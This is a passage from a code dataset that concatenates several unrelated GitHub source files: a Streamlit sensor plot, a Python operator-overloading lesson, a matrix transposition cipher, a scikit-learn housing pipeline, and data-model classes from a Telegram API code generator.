Dann kann hier der Graph mit der ID anstatt der Zeit als X-Achse ausgegeben werden.\n \"\"\")\n if st.button('Hier anzeigen'):\n import matplotlib.pyplot as plt\n plt.plot(df.index, df.Temperatur, label='Temperatur [°C]')\n plt.plot(df.index, df.Feuchte, label='Feuchte [%]')\n #plt.plot(new_df.index, new_df.Druck, label='Druck')\n plt.legend(loc='upper left')\n plt.title(f\"Termeraturverlauf von {name}\")\n plt.xlabel(\"ID\")\n st.pyplot(plt)\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"jonathanhoss/IOT_Streamlit_app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37751956733","text":"# Оператор Метод оператора\n#\n# x + y __add__(self, other)\n# x - y __sub__(self, other)\n# x * y __mul__(self, other)\n# x / y __truediv__(self, other)\n# x // y __floordiv__(self, other)\n# x % y __mod__(self, other)\n#\n# x += y __iadd__(self, other)\n# x -= y __isub__(self, other)\n# x *= y __imul__(self, other)\n# x /= y __itruediv__(self, other)\n# x //= y __ifloordiv__(self, other)\n# x %= y __imod__(self, other)\n\nclass Clock:\n __DAY = 86400 # число секунд в одном дне\n\n def __init__(self, seconds: int):\n if not isinstance(seconds, int):\n raise TypeError(\"Секунды должны быть целым числом\")\n self.seconds = seconds % self.__DAY\n\n def get_time(self):\n s = self.seconds % 60 # секунды\n m = (self.seconds // 60) % 60 # минуты\n h = (self.seconds // 3600) % 24 # часы\n return f\"{self.__get_formatted(h)}:{self.__get_formatted(m)}:{self.__get_formatted(s)}\"\n\n @classmethod\n def __get_formatted(cls, x):\n return str(x).rjust(2, \"0\")\n\n '''def __add__(self, other):\n if not isinstance(other, int):\n raise ArithmeticError(\"Правый операнд должен быть типом int\")\n\n return Clock(self.seconds + other)'''\n\n def __add__(self, other): # сложение object + int\n if not isinstance(other, (int, Clock)):\n raise ArithmeticError(\"Правый операнд должен быть типом int или объектом Clock\")\n\n sc = other if isinstance(other, int) else other.seconds\n return self.__class__(self.seconds + sc)\n\n def __radd__(self, other): # сложение int + object\n return self + other\n\n def __iadd__(self, other): # oject += int\n print(\"__iadd__\")\n if not isinstance(other, (int, Clock)):\n raise ArithmeticError(\"Правый операнд должен быть типом int или объектом Clock\")\n\n sc = other if isinstance(other, int) else other.seconds\n self.seconds += sc\n\n return self\n\n\n# c1 = Clock(1000)\n# print(c1.get_time())\n# c1.seconds = c1.seconds + 100 # изменение времени в объекте с1\n# c1 = c1 + 100 # Чтобы данная запись работала нужно добавить метод add\n# с1 = c1.__add__(100) # запись равно с1 = с1 + 100\n'''c1 = Clock(1000)\nc2 = Clock(2000)\nc3 = c1 + c2\nprint(c3.get_time())'''\nc1 = Clock(1000)\nc2 = Clock(2000)\nc3 = Clock(3000)\nc4 = c1 + c2 + c3\nprint(c4.get_time())\nс5 = 100 + c1\nс5 += 100\n","repo_name":"Motayassa/OOP_in_Python","sub_path":"oop/methods_add_sub_mul_div/theory1.py","file_name":"theory1.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"38296334868","text":"from numpy import array\n\n\ndef encode(message, keys):\n message = ''.join(message.split())\n liter = message[-1]\n n, m = len(keys[0]), len(keys[1])\n while len(message) % n != 0:\n message += liter\n matrix = [[j for j in message[i * n:(i + 1) * n]] for i in range(len(message) // n)]\n while len(matrix) % m != 0:\n tmp = liter * n\n matrix.append([j for j in tmp])\n # add key_n and sort\n matrix = array([array(item) for item in matrix])\n matrix = array([array([j for j in keys[0]]), *matrix]).transpose()\n matrix = array(sorted(matrix, key=lambda item: item[0])).transpose()[1:]\n # add key_m and sort\n key_m = keys[1] * (len(matrix) // m)\n matrix = array(matrix).transpose()\n matrix = array([array([j for j in key_m]), *matrix]).transpose()\n matrix = array([array(matrix[i * m:(i + 1) * m]) for i in range(len(matrix) // m)])\n matrix = array([array(sorted(item, key=lambda row: row[0])) for item in matrix])\n matrix = array([array(item.transpose()[1:]) for item in matrix])\n encoded = ''.join([''.join([''.join(row) for row in item]) for item in matrix])\n return encoded\n\n\ndef decode(message, keys):\n n, m = len(keys[0]), len(keys[1])\n encoded_keys = array([sorted(key) for key in keys])\n encoded = []\n # key_m\n for i in range(len(message) // m):\n if i == 0:\n tmp = [[j for j in message[i * m:(i + 1) * m]]]\n else:\n if i % n == 0:\n if tmp:\n tmp = [[j for j in encoded_keys[1]], *tmp]\n encoded.append(array([array(item) for item in tmp]).transpose())\n tmp = [[j for j in message[i * m:(i + 1) * m]]]\n else:\n tmp.append([j for j in message[i * m:(i + 1) * m]])\n if i + 1 == len(message) // m:\n tmp = [[j for j in encoded_keys[1]], *tmp]\n encoded.append(array([array(item) for item in tmp]).transpose())\n encoded = array(encoded)\n\n for k, item in enumerate(encoded):\n for i in range(len(keys[1])):\n for j, val in enumerate(item):\n if j != i:\n if keys[1][i] == item[j][0]:\n encoded[k][i], encoded[k][j] = array(list(encoded[k][j])), array(list(encoded[k][i]))\n break\n\n encoded = array([array(item.transpose()[1:]).transpose() for item in encoded])\n # key_n\n encoded = array([array([array([j for j in encoded_keys[0]]), *item]).transpose() for item in encoded])\n for k, item in enumerate(encoded):\n for i in range(len(keys[0])):\n for j, val in enumerate(item):\n if j != i:\n if keys[0][i] == item[j][0]:\n encoded[k][i], encoded[k][j] = array(list(encoded[k][j])), array(list(encoded[k][i]))\n break\n\n encoded = array([array(item.transpose()[1:]) for item in encoded])\n decoded = ''.join([''.join([''.join(row) for row in item]) for item in encoded])\n return decoded\n","repo_name":"sergey-jr/InfoSecurity","sub_path":"cipher/done/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72629018463","text":"import os\nimport tarfile\nfrom six.moves import urllib\n\nDOWNLOAD_ROOT = \"https://raw.githubusercontent.com/ageron/handson-ml/master/\"\nHOUSING_PATH = \"datasets/housing\"\nHOUSING_URL = DOWNLOAD_ROOT + HOUSING_PATH + \"/housing.tgz\"\n\ndef fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):\n if not os.path.isdir(housing_path):\n os.makedirs(housing_path)\n tgz_path = os.path.join(housing_path, \"housing.tgz\")\n urllib.request.urlretrieve(housing_url, tgz_path)\n housing_tgz = tarfile.open(tgz_path)\n housing_tgz.extractall(path=housing_path)\n housing_tgz.close()\n\nimport pandas as pd\n\ndef load_housing_data(housing_path=HOUSING_PATH):\n csv_path = os.path.join(housing_path, \"housing.csv\")\n return pd.read_csv(csv_path)\n\nfrom sklearn.base import BaseEstimator, TransformerMixin\n\nclass DataFrameSelector(BaseEstimator, TransformerMixin):\n def __init__(self, attribute_names):\n self.attribute_names = attribute_names\n def fit(self, X, y=None):\n return self\n def transform(self, X):\n return X[self.attribute_names].values\n\nimport numpy as np\n\nrooms_ix, bedrooms_ix, population_ix, household_ix = 3, 4, 5, 6\nclass CombinedAttributesAdder(BaseEstimator, TransformerMixin):\n def __init__(self, add_bedrooms_per_room=True):\n self.add_bedrooms_per_room = add_bedrooms_per_room\n def fit(self, X, y=None):\n return self\n def transform(self, X, y=None):\n rooms_per_household = X[:, rooms_ix] / X[:, household_ix]\n population_per_household = X[:, population_ix] / X[:, household_ix]\n if self.add_bedrooms_per_room:\n bedrooms_per_room = X[:, bedrooms_ix] / X[:, rooms_ix]\n return np.c_[X, rooms_per_household, population_per_household, bedrooms_per_room]\n else:\n return np.c_[X, rooms_per_household, population_per_household]\n\n\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.preprocessing import StandardScaler, Imputer, LabelBinarizer\n\nfetch_housing_data()\nhousing = load_housing_data()\n\nhousing['rooms_per_household'] = housing['total_rooms'] / housing['households']\nhousing['bedrooms_per_room'] = housing['total_bedrooms'] / housing['total_rooms']\nhousing['population_per_household'] = housing['population'] / housing['households']\n\nhousing = strat_train_set.drop('median_house_value', axis=1)\nhousing_babels = strat_train_set['median_house_value'].copy\n\nhousing_num = housing.drop('ocean_proximity', axis=1)\nnum_attribs = list(housing_num)\ncat_attribs = ['ocean_proximity']\n\nnum_pipeline = Pipeline([\n ('selector', DataFrameSelector(num_attribs)),\n ('imputer', Imputer(strategy='median')),\n ('attribs_adder', CombinedAttributesAdder()),\n ('std_scaler', StandardScaler()),\n])\n\ncat_pipeline = Pipeline([\n ('selector', DataFrameSelector(cat_attribs)),\n ('label_binarizer', LabelBinarizer()),\n])\n\nfull_pipeline = FeatureUnion(transformer_list=[\n ('num_pipeline', num_pipeline),\n ('cat_pipeline', cat_pipeline),\n])\n\nif __name__ == '__main__':\n housing_prepared = full_pipeline.fit_transform(housing)\n ","repo_name":"del874/machine-learning_study","sub_path":"housing.py","file_name":"housing.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"3473671456","text":"import re\nfrom itertools import chain\nfrom symbol import parameters\nfrom typing import Mapping, Union, List, Tuple, Optional, Callable\n\nfrom luckydonaldUtils.exceptions import assert_type_or_raise\nfrom luckydonaldUtils.functions import cached\nfrom luckydonaldUtils.imports.relative import relimport\n\nBUILTIN_NAMES = ('type', 'id') # everything which makes the variable become gray in PyCharm\nSENTENCE_SPLIT_REGEX = re.compile('[\\.!?](?:\\s+|(?=NOTE:))', re.MULTILINE)\n\nclass KwargableObject(Mapping):\n \"\"\" allow `**self`, and include all @property s \"\"\"\n def __getitem__(self, key):\n try:\n return self.__getattribute__(key)\n except AttributeError as e:\n raise KeyError(key)\n # end try\n # end def __getitem__\n\n def __len__(self):\n return len(list(self.__iter__()))\n # end def __len__\n\n def __iter__(self):\n import inspect\n def is_allowed(value):\n return isinstance(value, property)\n # end def is_allowed\n return iter(\n [name for (name) in vars(self) if not name.startswith(\"_\")] +\n [name for (name, value) in inspect.getmembers(Clazz, is_allowed)]\n )\n # end def __iter__\n\n def __repr__(self):\n return (\n \"{s.__class__.__name__}(\" +\n (\", \".join([\"{key}={value!r}\".format(key=k, value=self[k]) for k in self])) +\n \")\"\n ).format(s=self)\n # end def __repr__\n# end class KwargableObject\n\n\nclass ClassOrFunction(KwargableObject):\n def __init__(self, filepath=None):\n \"\"\"\n :param filepath: where this function or class should be stored.\n \"\"\"\n self.filepath = filepath\n# end class ClassOrFunction\n\n\n# noinspection PyCompatibility\nclass Clazz(ClassOrFunction):\n def __init__(\n self,\n clazz: Union[None, str] = None,\n import_path: Union[None, 'Import'] = None,\n imports: Union[None, List['Import']] = None,\n parent_clazz: Union[None, 'Type'] = None,\n link: Union[None, str] = None,\n description: Union[None, str] = None,\n parameters: Union[None, List['Variable']] = None,\n keywords: Union[None, List['Variable']] = None,\n ):\n super(Clazz, self).__init__()\n self.clazz = clazz\n self.import_path = import_path if import_path is not None else self.calculate_import_path()\n self.imports = imports if imports else [] # Imports needed by parameters and keywords.\n self.parent_clazz = parent_clazz if parent_clazz is not None else Type(\"object\", is_builtin=True)\n assert_type_or_raise(self.parent_clazz, Type, parameter_name=\"self.parent_clazz\")\n self.link = link\n self.description = description\n self.parameters = parameters if parameters else []\n self.keywords = keywords if keywords else []\n # end def __init__\n\n def calculate_import_path(self) -> 'Import':\n from code_generator import get_type_path\n import_path = get_type_path(self.clazz, as_object=True)\n return import_path\n # end def\n\n def calculate_filepath(self, folder: str) -> str:\n return self.import_path.calculate_filepath(folder)\n # end def\n\n @property\n def variables(self):\n return self.parameters + self.keywords\n # end def variables\n\n def has_same_variable(\n self,\n variable: 'Variable',\n ignore_pytg_name: bool = False,\n ignore_description: bool = False,\n ignore_optional: bool = False,\n ignore_type_always_is_value: bool = False,\n allow_additional_allowed_type_matchings: bool = False,\n ) -> bool:\n if self.get_same_variable(\n variable=variable, ignore_pytg_name=ignore_pytg_name, ignore_description=ignore_description,\n ignore_optional=ignore_optional, ignore_type_always_is_value=ignore_type_always_is_value,\n allow_additional_allowed_type_matchings=allow_additional_allowed_type_matchings,\n ) is None:\n return False\n # end if\n return False\n # end def\n\n def get_same_variable(\n self,\n variable: 'Variable',\n ignore_pytg_name: bool = False,\n ignore_description: bool = False,\n ignore_optional: bool = False,\n ignore_type_always_is_value: bool = False,\n allow_additional_allowed_type_matchings: bool = False,\n ) -> Optional['Variable']:\n assert_type_or_raise(variable, Variable, parameter_name='variable')\n for own_variable in self.variables:\n if own_variable.compare(\n variable,\n ignore_pytg_name=ignore_pytg_name,\n ignore_description=ignore_description,\n ignore_optional=ignore_optional,\n ignore_type_always_is_value=ignore_type_always_is_value,\n allow_additional_allowed_type_matchings=allow_additional_allowed_type_matchings,\n ):\n return own_variable\n # end if\n # end for\n return None\n # end if\n\n def __repr__(self):\n return (\n \"Clazz(\"\n \"clazz={s.clazz!r}, import_path={s.import_path!r}, imports={s.imports!r}, parent_clazz={s.parent_clazz!r}\"\n \", link={s.link!r}, description={s.description!r}, parameters={s.parameters!r}, keywords={s.keywords!r}\"\n \")\"\n ).format(s=self)\n # end def __repr__\n\n def to_array(self):\n return {\n \"clazz\": self.clazz,\n \"import_path\": self.import_path,\n \"imports\": self.imports,\n \"parent_clazz\": self.parent_clazz,\n \"link\": self.link,\n \"description\": self.description,\n \"parameters\": self.parameters,\n \"keywords\": self.keywords,\n }\n # end def\n\n def has_builtin_variables(self, duplicate_of_parent=None):\n \"\"\"\n :param duplicate_of_parent: Filter for variable.duplicate_of_parent. None to not filter, True/False to allow only those.\n :return:\n \"\"\"\n return any([\n variable.name in BUILTIN_NAMES\n for variable in self.variables\n if duplicate_of_parent is None or variable.duplicate_of_parent == duplicate_of_parent\n ])\n # end if\n\n def clone(self):\n return self.__class__(**self.to_array())\n # end def\n# end class Clazz\n\n\nclass Function(ClassOrFunction):\n def __init__(self, api_name=None, imports: List['Import']=None, link=None, description=None, returns=None, parameters: List['Variable']=None, keywords=None):\n super(Function, self).__init__()\n self.api_name = api_name # api_name\n self.imports = imports if imports else []\n self.link = link\n self.description = description\n self.returns = returns\n self.parameters = parameters\n self.keywords = keywords\n # end def __init__\n\n @property\n def variables(self):\n return self.parameters + self.keywords\n # end def variables\n\n @property\n def variable_names(self):\n return [var.name for var in self.variables]\n # end def variable_names\n\n @property\n def name(self):\n from code_generator import convert_to_underscore\n return convert_to_underscore(self.api_name)\n # end def name\n\n def __repr__(self):\n return (\n \"Function(\"\n \"api_name={s.api_name!r}, imports={s.imports!r}, link={s.link!r}, description={s.description!r}, \"\n \"returns={s.returns!r}, parameters={s.parameters!r}, keywords={s.keywords!r}\"\n \")\".format(s=self)\n )\n # end def __repr__\n\n @property\n def class_name(self) -> str:\n \"\"\"\n Makes the fist letter big, keep the rest of the camelCaseApiName.\n \"\"\"\n if not self.api_name: # empty string\n return self.api_name\n # end if\n return self.api_name[0].upper() + self.api_name[1:]\n # end def\n\n @property\n def class_name_teleflask_message(self) -> str:\n \"\"\"\n If it starts with `Send` remove that.\n \"\"\"\n # strip leading \"Send\"\n name = self.class_name # \"sendPhoto\" -> \"SendPhoto\"\n name = name[4:] if name.startswith('Send') else name # \"SendPhoto\" -> \"Photo\"\n name = name + \"Message\" # \"Photo\" -> \"PhotoMessage\"\n\n # e.g. \"MessageMessage\" will be replaced as \"TextMessage\"\n # b/c \"sendMessage\" -> \"SendMessage\" -> \"Message\" -> \"MessageMessage\" ==> \"TextMessage\"\n from code_generator_settings import MESSAGE_CLASS_OVERRIDES\n if name in MESSAGE_CLASS_OVERRIDES:\n return MESSAGE_CLASS_OVERRIDES[name]\n # end if\n return name\n # end def\n\n @property\n @cached\n def class_variables_separated(self) -> Tuple[List['Variable'], List['Variable'], List['Variable']]:\n args = []\n special_kwargs = [] # receiver and reply_id\n kwargs = []\n args_and_kwargs = chain((('arg', arg) for arg in self.parameters), (('kwarg', kwarg) for kwarg in self.keywords))\n for variable, param in args_and_kwargs:\n if param.name == \"chat_id\":\n # :param receiver: Unique identifier for the target chat or username of the target channel (in the format @channelusername)\n # :type receiver: int|str\n default = Type(\n 'None',\n is_builtin=True,\n always_is_value=None,\n is_list=False,\n import_path=None,\n description=\"Use the chat from the update context.\"\n )\n\n special_kwargs.append(Variable(\n api_name=param.api_name,\n pytg_name=param.name,\n name='receiver',\n types=[\n Type(\n 'str',\n is_builtin=True,\n always_is_value=None,\n is_list=False,\n import_path=None,\n description=\"The @username of user/group/channel.\"\n ),\n Type(\n 'int',\n is_builtin=True,\n always_is_value=None,\n is_list=False,\n import_path=None,\n description=\"The chat's id.\"\n )\n ],\n optional=True,\n default=default,\n description=\"Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.\"\n ))\n elif param.name == \"reply_to_message_id\":\n # :param reply_id: If the messages are a reply, ID of the original message\n # :type reply_id: int\n default = Type(\n 'DEFAULT_MESSAGE_ID',\n is_builtin=True,\n always_is_value='DEFAULT_MESSAGE_ID',\n is_list=False,\n import_path=None,\n description=\"So you can overwrite it with `None` if you don't want a reply.\"\n )\n special_kwargs.append(Variable(\n api_name=param.api_name,\n name='reply_id',\n pytg_name=param.name,\n types=[\n default,\n Type(\n 'int',\n is_builtin=True,\n always_is_value=None,\n is_list=False,\n import_path=None,\n description=\"A different `message_id` to reply to.\"\n )\n ],\n optional=True,\n default=default,\n description=\"Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.\"\n ))\n elif variable == 'arg':\n args.append(param)\n else:\n assert variable == 'kwarg'\n kwargs.append(param)\n # end if\n # end for\n return args, special_kwargs, kwargs\n # end def\n\n @property\n def variables(self):\n return self.parameters + self.keywords\n # end def variables\n# end class Function\n\n\n# noinspection PyCompatibility\nclass Variable(dict):\n def __init__(\n self,\n api_name: str = None,\n name: str = None,\n pytg_name: str = None,\n types: List['Type'] = None,\n optional: bool = None,\n default: Union[None, str, 'Type'] = None,\n description: Optional[str] = None,\n duplicate_of_parent: Optional[bool] = None,\n additional_allowed_type_matchings: Optional[List[List['Type']]] = None,\n ):\n \"\"\"\n :param api_name: Name the telegram api uses.\n :param name: Internal name we use.\n :param pytg_name: Internal name we use with pytg's send_* functions in the teleflask message classes.\n :param types: `list` of :class:`Type`. [Type(int), Type(bool)] or [Type(Message)] etc.\n :param optional: If it is not needed. `True` will be a normal parameter, `False` means a kwarg.\n :param default: If it is optional, that is the default value. Else it uses \"None\" via templating.\n :param duplicate_of_parent: If True, this (class) variable is also present in the parent class we inherit from.\n :param description:\n \"\"\"\n self.api_name = api_name # parse_param_types(param)\n self.name = name if name else api_name # parse_param_types(param)\n self.types = types if types else [] # parse_param_types(param)\n self.pytg_name = pytg_name if pytg_name else name # teleflask messages\n self.optional = optional # bool # parse_param_types(param)\n self.default = default # bool\n self.description = description # some text about it. # parse_param_types(param)\n self.duplicate_of_parent = duplicate_of_parent\n self.additional_allowed_type_matchings = additional_allowed_type_matchings if additional_allowed_type_matchings else []\n # end def\n\n \"\"\"\n Get all needed Imports.\n\n :return: Return set of all needed :class:`Import` s.\n :rtype: set\n \"\"\"\n @property\n def all_imports(self):\n imports = set()\n for type in self.types:\n if type.import_path:\n imports.add(Import(type.import_path.rstrip('.'), type.string))\n # end if\n # end for\n return imports\n # end def all_imports\n\n @property\n def typehint(self) -> str:\n \"\"\"\n Returns a python 3.5+ type hint string.\n\n Depending on the amount of types in the self.types list.\n - For 0 elements, the returned type is `Any`.\n - For 1 element it's just that type.\n - For more elements it's a `Union[...]`.\n\n :uses: Variable.types\n :uses: Type.typehint\n \"\"\"\n if len(self.types) == 0:\n return \"Any\"\n # end if\n if len(self.types) == 1:\n return self.types[0].typehint\n # end if\n return (\", \".join(t.typehint for t in self.types)).join((\"Union[\", \"]\"))\n # end def\n\n @property\n def typehint_optional(self):\n if self.optional:\n return self.typehint.join((\"Optional[\", \"]\"))\n # end if\n return self.typehint\n # end def\n\n @property\n def typehint_quoted(self) -> str:\n \"\"\"\n Returns a python 3.5+ type hint string.\n\n Depending on the amount of types in the self.types list.\n - For 0 elements, the returned type is `Any`.\n - For 1 element it's just that type, quoted.\n - For more elements it's a `Union[...]`.\n\n :uses: Variable.types\n :uses: Type.typehint\n \"\"\"\n if len(self.types) == 0:\n return \"Any\"\n # end if\n if len(self.types) == 1:\n return repr(self.types[0].typehint)\n # end if\n return (\", \".join(repr(t.typehint) for t in self.types)).join((\"Union[\", \"]\"))\n # end def\n\n @property\n def typehint_quoted_optional(self):\n if self.optional:\n return self.typehint_quoted.join((\"Optional[\", \"]\"))\n # end if\n return self.typehint_quoted\n\n # end def\n\n @property\n def typehint_has_model(self):\n for t in self.types:\n if not t.is_builtin:\n return True\n # end if\n # end for\n return False\n # end def\n\n @property\n def typehint_optional_model(self):\n \"\"\"\n Creates a typehint without Json type.\n For type annotations of the parsed variable, and for final validation.\n See https://github.com/tiangolo/fastapi/issues/884.\n \"\"\"\n return self.create_typehint_optional_model(json_mode=False)\n # end def\n\n @property\n def typehint_optional_model_json(self):\n \"\"\"\n Creates a typehint with Json type for fastapi query params.\n See https://github.com/tiangolo/fastapi/issues/884.\n \"\"\"\n return self.create_typehint_optional_model(json_mode=True)\n # end def\n\n def create_typehint_optional_model(self, json_mode: bool = False, quote_models: bool = True):\n \"\"\"\n :param json_mode: If we should wrap the thing in `Json[...]`\n :param quote_models: If we should wrap models in quotes for resolving them later.\n\n Examples:\n - `param.create_typehint_optional_model(json_mode=True, quote_models=True)`:\n Creates a typehint with Json[...'FooModel'...] type for fastapi query params.\n\n - `param.create_typehint_optional_model(json_mode=True, quote_models=True)`:\n Creates a typehint with a quoted 'FooModel' for lazy loading models, i.e. when using in arguments of depending models.\n\n - `param.create_typehint_optional_model(json_mode=False, quote_models=False)`\n Creates a typehint without `Json` type, for type annotations of the parsed variable, and e.g. for final validation with `parse_obj_as`.\n \"\"\"\n if len(self.types) == 0:\n type_str = \"Any\"\n else:\n if quote_models:\n wrap_models: Callable[[str], str] = lambda type_str: f'{f\"{type_str}Model\"!r}'\n else:\n wrap_models: Callable[[str], str] = lambda type_str: f'{type_str}Model'\n # end if\n if len(self.types) == 1:\n type_str = self.create_model(self.types[0], wrap_models=wrap_models)\n else:\n type_str = (\n \", \".join(self.create_model(t, wrap_models=wrap_models) for t in self.types)\n ).join((\"Union[\", \"]\"))\n # end if\n # end if\n\n if json_mode and self.typehint_has_model:\n type_str = type_str.join((\"Json[\", \"]\"))\n # end def\n\n if self.optional:\n type_str = type_str.join((\"Optional[\", \"]\"))\n # end if\n return type_str\n # end def\n\n\n @staticmethod\n def create_model(the_type: 'Type', wrap_models: Union[None, Callable[[str], str]] = None):\n type_str = the_type.string\n if wrap_models and not the_type.is_builtin:\n # noinspection PyCompatibility\n type_str = wrap_models(type_str)\n # end def\n for i in range(the_type.is_list):\n type_str = type_str.join((\"List[\", \"]\"))\n # end def\n return type_str\n # end def\n\n @property\n def is_fixed_value(self) -> bool:\n if self.optional:\n # if it is \"True or None\" it is not \"always True\"\n return False\n # end if\n if len(self.types) != 1:\n # more than one possible value\n return False\n # end if\n # noinspection PyShadowingBuiltins\n type: Type = self.types[0]\n if type.always_is_value is None:\n # we have no such 'always' value set.\n return False\n # end if\n\n # we did all the checks, so it must be always be the same value.\n return True\n # end if\n\n @property\n def description_sentence_split_list(self) -> Optional[List[str]]:\n if self.description is None:\n return None\n # end if\n text: str = self.description\n\n splits = SENTENCE_SPLIT_REGEX.split(text)\n if not \". \".join(splits) in (text, text.replace('.NOTE:', '. NOTE:')):\n return [text]\n # end if\n return [f'{split}{\"\" if split.endswith(\".\") else \".\"}' for split in splits]\n # end def\n\n def description_sentence_split_str(self, *, indent=0) -> Optional[str]:\n splits = self.description_sentence_split_list\n if splits[0] == 'Optional.':\n splits[1] = f'Optional. {splits[1]}'\n del splits[0]\n # end if\n if splits is None:\n return None\n # end if\n return f\"\\n{' ' * indent}\".join(splits)\n # end def\n\n @property\n def value_to_set(self):\n \"\"\"\n Used in super class call super().__init__(...)\n :return:\n \"\"\"\n if not self.is_fixed_value:\n return self.name\n # end if\n\n # noinspection PyShadowingBuiltins\n type: Type = self.types[0]\n if type.always_is_value in ('True', 'False', 'None'):\n return type.always_is_value\n # end if\n return repr(type.always_is_value) # so we get 'photo'\n # end def\n\n def __repr__(self):\n return (\n \"Variable(\"\n \"api_name={s.api_name!r}, name={s.name!r}, pytg_name={s.pytg_name!r}, types={s.types!r}, \"\n \"optional={s.optional!r}, default={s.default!r}, description={s.description!r}, \"\n \"duplicate_of_parent={s.duplicate_of_parent!r}\"\n # \"duplicate_of_parent={s.duplicate_of_parent!r}, additional_allowed_type_matchings={s.additional_allowed_type_matchings!r}\"\n \")\"\n ).format(s=self)\n # end def __repr__\n\n def __eq__(self, other: object) -> bool:\n \"\"\" self == other \"\"\"\n if not isinstance(other, self.__class__):\n return super().__eq__(other)\n # end if\n return self.compare(other, ignore_description=False)\n # end def __eq__\n\n def compare(\n self,\n other: 'Variable',\n ignore_pytg_name: bool = False,\n ignore_description: bool = False,\n ignore_optional: bool = False,\n ignore_type_always_is_value: bool = False,\n allow_additional_allowed_type_matchings: bool = False,\n ):\n assert_type_or_raise(other, Variable, parameter_name='other')\n return (\n self.api_name == other.api_name and\n self.name == other.name and\n (\n any(\n len(own_types) == len(other.types)\n and\n all(\n Type.compare(\n self=own_type,\n other=other.types[i],\n ignore_always_is_value=ignore_type_always_is_value,\n ignore_description=ignore_description\n )\n for i, own_type\n in enumerate(own_types)\n )\n for own_types in\n [self.types] +\n (self.additional_allowed_type_matchings if allow_additional_allowed_type_matchings and self.additional_allowed_type_matchings else [])\n )\n ) and\n (ignore_pytg_name or self.pytg_name == other.pytg_name) and\n (ignore_optional or self.optional == other.optional) and\n self.default == other.default and\n (ignore_description or self.description == other.description) and\n True\n )\n # end def compare\n\n def to_array(self):\n return {\n \"api_name\": self.api_name,\n \"name\": self.name,\n \"types\": self.types,\n \"pytg_name\": self.pytg_name,\n \"optional\": self.optional,\n \"default\": self.default,\n \"description\": self.description,\n \"duplicate_of_parent\": self.duplicate_of_parent,\n \"additional_allowed_type_matchings\": [types[:] for types in self.additional_allowed_type_matchings], # deep\n }\n # end def\n\n def clone(self):\n return self.__class__(**self.to_array())\n # end def\n# end class Variable\n\n\nclass Type(dict):\n def __init__(self, string=None, is_builtin=None, always_is_value=None, is_list=0, import_path=None, description=None):\n \"\"\"\n Stores variable types.\n\n :param string: the type (e.g. \"bool\")\n :type string: str\n\n :param is_builtin: If it is a build in type (:class:`float`, :class:`int`, ...)\n or not (classes like :class:`Message`, :class:`Peer`...)\n :type is_builtin: bool\n\n :param always_is_value: None or the only possible value (e.g. a bool, always \"True\")\n :type always_is_value: None or str\n\n :param is_list: Levels of lists.\n `0` = not a list.\n `1` = it is an list of :param:`string`s type (e.g. list of bool could be [True, False] ).\n If is \"list of list of\" that value is `2`\n :type is_list: int\n\n :param import_path: from import . None for builtins.\n :type import_path: str or None\n\n :param description: if there are additional comments needed.\n :type description: str or None\n \"\"\"\n super(Type, self).__init__()\n self.string = string # the type (e.g. \"bool\")\n self.is_builtin = is_builtin # bool. If it is a build in type (float, int, ...) or not.\n self.always_is_value = always_is_value # None or the only possible value (e.g. a bool, always \"True\")\n self.is_list = is_list # number denoting the list level. 0 means 'no list'. 1 is foo[], and 2 would be foo[][].\n self.import_path = import_path # from import \n self.description = description # if there are additional comments needed.\n # end def __init__\n\n @property\n def as_import(self) -> 'Import':\n return Import(self.import_path, self.string)\n # end def as_import\n\n @property\n def typehint(self) -> str:\n \"\"\"\n Returns a python 3.5+ type hint string.\n \"\"\"\n type_str = self.string\n for i in range(self.is_list):\n type_str = type_str.join((\"List[\", \"]\"))\n # end for\n return type_str\n # end def\n\n def __str__(self):\n return \"{list}<{name}>\".format(list=\"list of \" * self.is_list, name=self.string)\n # end def __str__\n\n def __repr__(self):\n return (\n \"Type(\"\n \"string={s.string!r}, is_builtin={s.is_builtin!r}, always_is_value={s.always_is_value!r}, \"\n \"is_list={s.is_list!r}, import_path={s.import_path!r}, description={s.description!r}\"\n \")\"\n ).format(s=self)\n # end def __repr__\n\n def __eq__(self, other: object) -> bool:\n \"\"\" self == other \"\"\"\n if not isinstance(other, self.__class__):\n return super().__eq__(other)\n # end if\n return self.compare(other, ignore_description=False)\n # end def __eq__\n\n def compare(self, other: 'Type', ignore_always_is_value: bool = False, ignore_description: bool = False):\n assert_type_or_raise(other, Type, parameter_name='other')\n return (\n self.string == other.string and # the type (e.g. \"bool\")\n self.is_builtin == other.is_builtin and # bool. If it is a build in type (float, int, ...) or not.\n (ignore_always_is_value or self.always_is_value == other.always_is_value) and # None or the only possible value (e.g. a bool, always \"True\")\n self.is_list == other.is_list and # number denoting the list level. 0 means 'no list'. 1 is foo[], and 2 would be foo[][].\n self.import_path == other.import_path and # from import \n (ignore_description or self.description == other.description) and # if there are additional comments needed.\n True\n )\n # end def compare\n# end class Type\n\n\nclass Import(dict):\n \"\"\" from import \"\"\"\n def __init__(self, path: Union[str, None] = None, name: Union[str, None] = None, is_init: bool = False):\n \"\"\"\n from import \n\n :param path: part where to import from\n :param name: actual name to import\n :param is_init: if this is not `.py`, but `/__init__.py`.\n \"\"\"\n super(Import, self).__init__()\n self.path = path\n self.name = name\n self.is_init = is_init\n # end def __init__\n\n def relative_import_full(self, base_path: Union[str, 'Import']):\n if isinstance(base_path, Import):\n base_path = base_path.path\n # end if\n base_path: str\n\n return relimport(self.full, base_path)\n # end def\n\n def relative_import(self, base_path: Union[str, 'Import']):\n from code_generator_template import split_path\n import_path, import_name = split_path(self.relative_import_full(base_path=base_path))\n return Import(import_path, import_name)\n # end def\n\n\n @property\n def full(self):\n 